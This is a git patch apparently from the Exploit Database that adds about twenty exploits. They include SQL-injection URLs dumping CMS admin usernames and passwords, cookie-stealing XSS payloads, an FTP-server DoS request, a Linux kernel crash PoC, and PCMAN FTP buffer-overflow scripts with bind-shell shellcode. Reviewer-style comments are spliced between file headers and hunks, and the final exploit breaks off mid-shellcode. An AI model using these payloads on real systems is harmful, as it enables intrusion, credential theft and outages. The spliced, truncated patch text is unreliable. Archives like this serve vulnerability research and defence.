From 5f29698d9127cfb10b3312b1277055c02602e03a Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 1 Feb 2014 04:26:32 +0000 Subject: [PATCH] Updated 02_01_2014 --- files.csv | 20 ++++++++ platforms/hardware/remote/31298.txt | 7 +++ platforms/jsp/webapps/31299.txt | 9 ++++ platforms/linux/dos/31305.c | 74 ++++++++++++++++++++++++++++ platforms/php/webapps/31256.txt | 48 ++++++++++++++++++ platforms/php/webapps/31288.txt | 7 +++ platforms/php/webapps/31289.txt | 9 ++++ platforms/php/webapps/31290.txt | 7 +++ platforms/php/webapps/31291.txt | 7 +++ platforms/php/webapps/31292.txt | 7 +++ platforms/php/webapps/31293.txt | 8 +++ platforms/php/webapps/31294.txt | 7 +++ platforms/php/webapps/31295.txt | 9 ++++ platforms/php/webapps/31296.txt | 9 ++++ platforms/php/webapps/31297.txt | 7 +++ platforms/php/webapps/31303.txt | 7 +++ platforms/php/webapps/31304.txt | 9 ++++ platforms/windows/dos/31302.txt | 12 +++++ platforms/windows/remote/31254.py | 66 +++++++++++++++++++++++++ platforms/windows/remote/31255.py | 66 +++++++++++++++++++++++++ platforms/windows/remote/31260.py | 76 +++++++++++++++++++++++++++++ 21 files changed, 471 insertions(+) create mode 100755 platforms/hardware/remote/31298.txt create mode 100755 platforms/jsp/webapps/31299.txt create mode 100755 platforms/linux/dos/31305.c create mode 100755 platforms/php/webapps/31256.txt create mode 100755 platforms/php/webapps/31288.txt create mode 100755 platforms/php/webapps/31289.txt create mode 100755 platforms/php/webapps/31290.txt create mode 100755 platforms/php/webapps/31291.txt create mode 100755 platforms/php/webapps/31292.txt create mode 100755 platforms/php/webapps/31293.txt create mode 100755 platforms/php/webapps/31294.txt create mode 100755 platforms/php/webapps/31295.txt create mode 100755 platforms/php/webapps/31296.txt create mode 100755 platforms/php/webapps/31297.txt create mode 100755 platforms/php/webapps/31303.txt create mode 100755 platforms/php/webapps/31304.txt create mode 100755 platforms/windows/dos/31302.txt create mode 100755 
platforms/windows/remote/31254.py create mode 100755 platforms/windows/remote/31255.py create mode 100755 platforms/windows/remote/31260.py
diff --git a/files.csv b/files.csv
index 62a7b5d5f..49f6f0b24 100755
--- a/files.csv
+++ b/files.csv
@@ -28068,7 +28068,11 @@ id,file,description,date,author,platform,type,port
 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80
+31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
+31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
+31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80
 31258,platforms/hardware/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,hardware,webapps,0
+31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)",2014-01-29,"Dario Estrada",windows,remote,53
 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443
 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80
 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0
@@ -28094,3 +28098,19 @@ id,file,description,date,author,platform,type,port
 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
 31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0
 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31288,platforms/php/webapps/31288.txt,"Joomla! and Mambo 'com_hello_world' Component 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module 'artid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31290,platforms/php/webapps/31290.txt,"auraCMS 2.2 'lihatberita' Module 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
+31291,platforms/php/webapps/31291.txt,"Joomla! and Mambo 'com_publication' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0
+31292,platforms/php/webapps/31292.txt,"Joomla! and Mambo 'com_blog' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0
+31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0
+31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability",2008-02-25,-=Mizo=-,php,webapps,0
+31295,platforms/php/webapps/31295.txt,"Joomla! and Mambo 'com_wines' 1.0 Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0
+31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 'section' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0
+31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module 'cid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0
+31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 'FILELIST' Parameter Cross-Site Scripting Vulnerability",2008-02-25,nnposter,hardware,remote,0
+31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCms 7.0.3 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0
+31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 'Content-Length' Parameter NULL Pointer Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0
+31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0
+31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0
+31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0
diff --git a/platforms/hardware/remote/31298.txt b/platforms/hardware/remote/31298.txt
new file mode 100755
index 000000000..75cfd0536
--- /dev/null
+++ b/platforms/hardware/remote/31298.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27982/info
+
+Packeteer PacketShaper and PolicyCenter are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+https://www.example.com/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E
\ No newline at end of file
diff --git a/platforms/jsp/webapps/31299.txt b/platforms/jsp/webapps/31299.txt
new file mode 100755
index 000000000..8d4780a2f
--- /dev/null
+++ b/platforms/jsp/webapps/31299.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27986/info
+
+Alkacon OpenCms is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+OpenCms 7.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/
\ No newline at end of file
diff --git a/platforms/linux/dos/31305.c b/platforms/linux/dos/31305.c
new file mode 100755
index 000000000..1877d47f2
--- /dev/null
+++ b/platforms/linux/dos/31305.c
@@ -0,0 +1,74 @@
+/*
+ * PoC trigger for the linux 3.4+ recvmmsg x32 compat bug, based on the manpage
+ *
+ * https://code.google.com/p/chromium/issues/detail?id=338594
+ *
+ * $ while true; do echo $RANDOM > /dev/udp/127.0.0.1/1234; sleep 0.25; done
+ */
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define __X32_SYSCALL_BIT 0x40000000
+#undef __NR_recvmmsg
+#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+
+int
+main(void)
+{
+#define VLEN 10
+#define BUFSIZE 200
+#define TIMEOUT 1
+ int sockfd, retval, i;
+ struct sockaddr_in sa;
+ struct mmsghdr msgs[VLEN];
+ struct iovec iovecs[VLEN];
+ char bufs[VLEN][BUFSIZE+1];
+ struct timespec timeout;
+
+ sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+ if (sockfd == -1) {
+ perror("socket()");
+ exit(EXIT_FAILURE);
+ }
+
+ sa.sin_family = AF_INET;
+ sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+ sa.sin_port = htons(1234);
+ if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+ perror("bind()");
+ exit(EXIT_FAILURE);
+ }
+
+ memset(msgs, 0, sizeof(msgs));
+ for (i = 0; i < VLEN; i++) {
+ iovecs[i].iov_base = bufs[i];
+ iovecs[i].iov_len = BUFSIZE;
+ msgs[i].msg_hdr.msg_iov = &iovecs[i];
+ msgs[i].msg_hdr.msg_iovlen = 1;
+ }
+
+ timeout.tv_sec = TIMEOUT;
+ timeout.tv_nsec = 0;
+
+// retval = recvmmsg(sockfd, msgs, VLEN, 0, &timeout);
+// retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, &timeout);
+ retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1ul);
+ if (retval == -1) {
+ perror("recvmmsg()");
+ exit(EXIT_FAILURE);
+ }
+
+ printf("%d messages received\n", retval);
+ for (i = 0; i < retval; i++) {
+ bufs[i][msgs[i].msg_len] = 0;
+ printf("%d %s", i+1, bufs[i]);
+ }
+ exit(EXIT_SUCCESS);
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/31256.txt b/platforms/php/webapps/31256.txt
new file mode 100755
index 000000000..5fa608fd4
--- /dev/null
+++ b/platforms/php/webapps/31256.txt
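Review bot: The active `syscall` line passes `(void *)1ul` as the timeout argument, while the `timeout` struct filled two statements earlier is referenced only by the two commented-out calls above it, so a reader cannot tell whether the bogus pointer is the point of the PoC or a leftover from editing. A one-line comment on that call would settle it, for example `/* invalid user pointer passed instead of &timeout: this is the compat-path condition the PoC exercises */`, which the header comment suggests is the intent; the now-unused `timeout` initialisation could then be dropped or kept as the documented known-good variant. The seven `#include` lines carry no header names in this rendering, which looks like an extraction artefact (angle brackets stripped) rather than an omission in the commit, so the file should be compared with the upstream copy before anyone compiles from this text.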
@@ -0,0 +1,48 @@
+# Exploit Title: linPHA 1.3.4 - Pemanent XSS and CSRF
+# Date: 28/01/2014
+# Exploit Author: killall-9@mail.com
+# Vendor Homepage: http://sourceforge.net/projects/linpha/
+# Software Link: http://sourceforge.net/projects/linpha/files/latest/download
+# Version: 1.3.4
+# Tested on: Virtualbox (debian) and Apache
+
+===[ Exploit ]===
+
+1) Permanent XSS=>
+.....
+POST /linpha-1.3.4/actions/submit_mod_data.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/linpha-1.3.4/admin.php?page=mysettings
+Cookie: PHPSESSID=bbdjarqpmknfpubtnc29rgodu0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 153
+
+friend_user_name=admin&friend_full_name=%3Cscript%3Ealert%28%22xss+here%22%29%3B%3C%2Fscript%3E&friend_user_mail=admin%40gmail.com&id=1&action=frienduser
+.....
+
+
+2) CSRF (poc)=>
+.....
+
+
+Pinata-CSRF-Tool
+
+
+
+
+
+
+
+
+
+
+
+.....
+
+These vulnerabilities was found in the administration panel.
+cheerZ.:
diff --git a/platforms/php/webapps/31288.txt b/platforms/php/webapps/31288.txt
new file mode 100755
index 000000000..c63ee2c8b
--- /dev/null
+++ b/platforms/php/webapps/31288.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27956/info
+
+The Joomla! and Mambo 'com_hello_world' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/mos_users/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31289.txt b/platforms/php/webapps/31289.txt
new file mode 100755
index 000000000..d1ad37170
--- /dev/null
+++ b/platforms/php/webapps/31289.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27957/info
+
+The Gallery module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Gallery 1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/modules.php?name=Sections&sop=printpage&artid=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**
\ No newline at end of file
diff --git a/platforms/php/webapps/31290.txt b/platforms/php/webapps/31290.txt
new file mode 100755
index 000000000..24172c00c
--- /dev/null
+++ b/platforms/php/webapps/31290.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27959/info
+
+auraCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?pilih=lihatberita&id=-9999999/**/union/**/select/**/0,1,password,3,4,user,6/**/from/**/user/*where%20admin1/**
\ No newline at end of file
diff --git a/platforms/php/webapps/31291.txt b/platforms/php/webapps/31291.txt
new file mode 100755
index 000000000..7bddc03e9
--- /dev/null
+++ b/platforms/php/webapps/31291.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27970/info
+
+The Joomla! and Mambo 'com_publication' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31292.txt b/platforms/php/webapps/31292.txt
new file mode 100755
index 000000000..33cc3d033
--- /dev/null
+++ b/platforms/php/webapps/31292.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27971/info
+
+The 'com_blog' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL_INJECTION
\ No newline at end of file
diff --git a/platforms/php/webapps/31293.txt b/platforms/php/webapps/31293.txt
new file mode 100755
index 000000000..396c70a5f
--- /dev/null
+++ b/platforms/php/webapps/31293.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27972/info
+
+Gary's Cookbook module for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+f
+rom%2F%2A%2A%2Fmos_users/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31294.txt b/platforms/php/webapps/31294.txt
new file mode 100755
index 000000000..a22eb2648
--- /dev/null
+++ b/platforms/php/webapps/31294.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27973/info
+
+The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31295.txt b/platforms/php/webapps/31295.txt
new file mode 100755
index 000000000..5f1225b4f
--- /dev/null
+++ b/platforms/php/webapps/31295.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27975/info
+
+The 'com_wines' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_wines&Itemid=S@BUN&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,use
+rname+from%2F%2A%2A%2Fmos_users/*
+
diff --git a/platforms/php/webapps/31296.txt b/platforms/php/webapps/31296.txt
new file mode 100755
index 000000000..a8a610f8e
--- /dev/null
+++ b/platforms/php/webapps/31296.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27977/info
+
+Simple Shop component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(usernam
+e,0x3a,password)/**/from/**/jos_users/*
+
diff --git a/platforms/php/webapps/31297.txt b/platforms/php/webapps/31297.txt
new file mode 100755
index 000000000..7a5c558de
--- /dev/null
+++ b/platforms/php/webapps/31297.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27980/info
+
+The 'Sell' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
\ No newline at end of file
diff --git a/platforms/php/webapps/31303.txt b/platforms/php/webapps/31303.txt
new file mode 100755
index 000000000..6932dbe21
--- /dev/null
+++ b/platforms/php/webapps/31303.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27994/info
+
+The Joomla! and Mambo 'com_inter' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user
\ No newline at end of file
diff --git a/platforms/php/webapps/31304.txt b/platforms/php/webapps/31304.txt
new file mode 100755
index 000000000..ad66c5b38
--- /dev/null
+++ b/platforms/php/webapps/31304.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27999/info
+
+Plume CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Plume CMS 1.2.2; other versions may be affected as well.
+
+http://www.example.com/manager/xmedia.php?dir=theme/default/&mode=
\ No newline at end of file
diff --git a/platforms/windows/dos/31302.txt b/platforms/windows/dos/31302.txt
new file mode 100755
index 000000000..661319b23
--- /dev/null
+++ b/platforms/windows/dos/31302.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27993/info
+
+SurgeFTP is prone to a remote denial-of-service vulnerability because it fails to perform adequately boundary checks on user-supplied input.
+
+Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users.
+
+SurgeFTP 2.3a2 is vulnerable; other versions may also be affected.
+
+GET / HTTP/1.0
+Content-Length: 2147483647
+
+boom
diff --git a/platforms/windows/remote/31254.py b/platforms/windows/remote/31254.py
new file mode 100755
index 000000000..5c489c400
--- /dev/null
+++ b/platforms/windows/remote/31254.py
@@ -0,0 +1,66 @@
+# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
+# Date: Jan 25,2014
+# Exploit Author: Mahmod Mahajna (Mahy)
+# Version: 2.07
+# Tested on: Windows 7 sp1 x64 (english)
+# Email: m.dofo123@gmail.com
+import socket as s
+from sys import argv
+#
+if(len(argv) != 4):
+ print "USAGE: %s host " % argv[0]
+ exit(1)
+else:
+ #store command line arguments
+ script,host,fuser,fpass=argv
+ #vars
+ junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
+ espaddress = '\x59\x06\xbb\x76' # 76BB0659
+ nops = '\x90' * 10
+ shellcode = ( # BIND SHELL | PORT 4444
+ "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
+ "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
+ "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
+ "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
+ "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
+ "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
+ "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
+ "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
+ "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
+ "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
+ "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
+ "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
+ "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
+ "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
+ "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
+ "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
+ "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
+ "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
+ "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
+ "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
+ "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
+ "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
+ "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
+ "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
+ "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
+ sploit = junk+espaddress+nops+shellcode
+ #create socket
+ conn = s.socket(s.AF_INET,s.SOCK_STREAM)
+ #establish connection to server
+ conn.connect((host,21))
+ #post ftp user
+ conn.send('USER '+fuser+'\r\n')
+ #wait for response
+ uf = conn.recv(1024)
+ #post ftp password
+ conn.send('PASS '+fpass+'\r\n')
+ #wait for response
+ pf = conn.recv(1024)
+ #send ftp command with sploit
+ conn.send('ABOR '+sploit+'\r\n')
+ cf = conn.recv(1024)
+ #close connection
+ conn.close()
+
+
+
diff --git a/platforms/windows/remote/31255.py b/platforms/windows/remote/31255.py
new file mode 100755
index 000000000..f8fa843ec
--- /dev/null
+++ b/platforms/windows/remote/31255.py
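Review bot: `uf`, `pf` and `cf` receive the server's replies to USER, PASS and the final command but are never read, so the script proceeds identically whatever the server answered and a reader looks in vain for the check those names promise; either drop the assignments (`conn.recv(1024)` on its own) or bind to `_` so the intent is explicit. The `print "USAGE: %s host " % argv[0]` line documents only one of the three arguments the `len(argv) != 4` check requires; the angle-bracketed names were most likely lost in this rendering, but the upstream file should be checked so the usage text and the check agree. The exit in that branch is the bare builtin `exit(1)`, which depends on the `site` module being loaded; `sys.exit(1)` is the portable form. The same three points apply unchanged to platforms/windows/remote/31255.py, which differs from this file only in the pad length and the FTP verb.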
@@ -0,0 +1,66 @@
+# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow
+# Date: Jan 25,2014
+# Exploit Author: Mahmod Mahajna (Mahy)
+# Version: 2.07
+# Tested on: Windows 7 sp1 x64 (english)
+# Email: m.dofo123@gmail.com
+import socket as s
+from sys import argv
+#
+if(len(argv) != 4):
+ print "USAGE: %s host " % argv[0]
+ exit(1)
+else:
+ #store command line arguments
+ script,host,fuser,fpass=argv
+ #vars
+ junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
+ espaddress = '\x59\x06\xbb\x76' # 76BB0659
+ nops = '\x90' * 10
+ shellcode = ( # BIND SHELL | PORT 4444
+ "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
+ "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
+ "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
+ "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
+ "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
+ "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
+ "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
+ "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
+ "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
+ "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
+ "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
+ "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
+ "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
+ "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
+ "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
+ "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
+ "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
+ "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
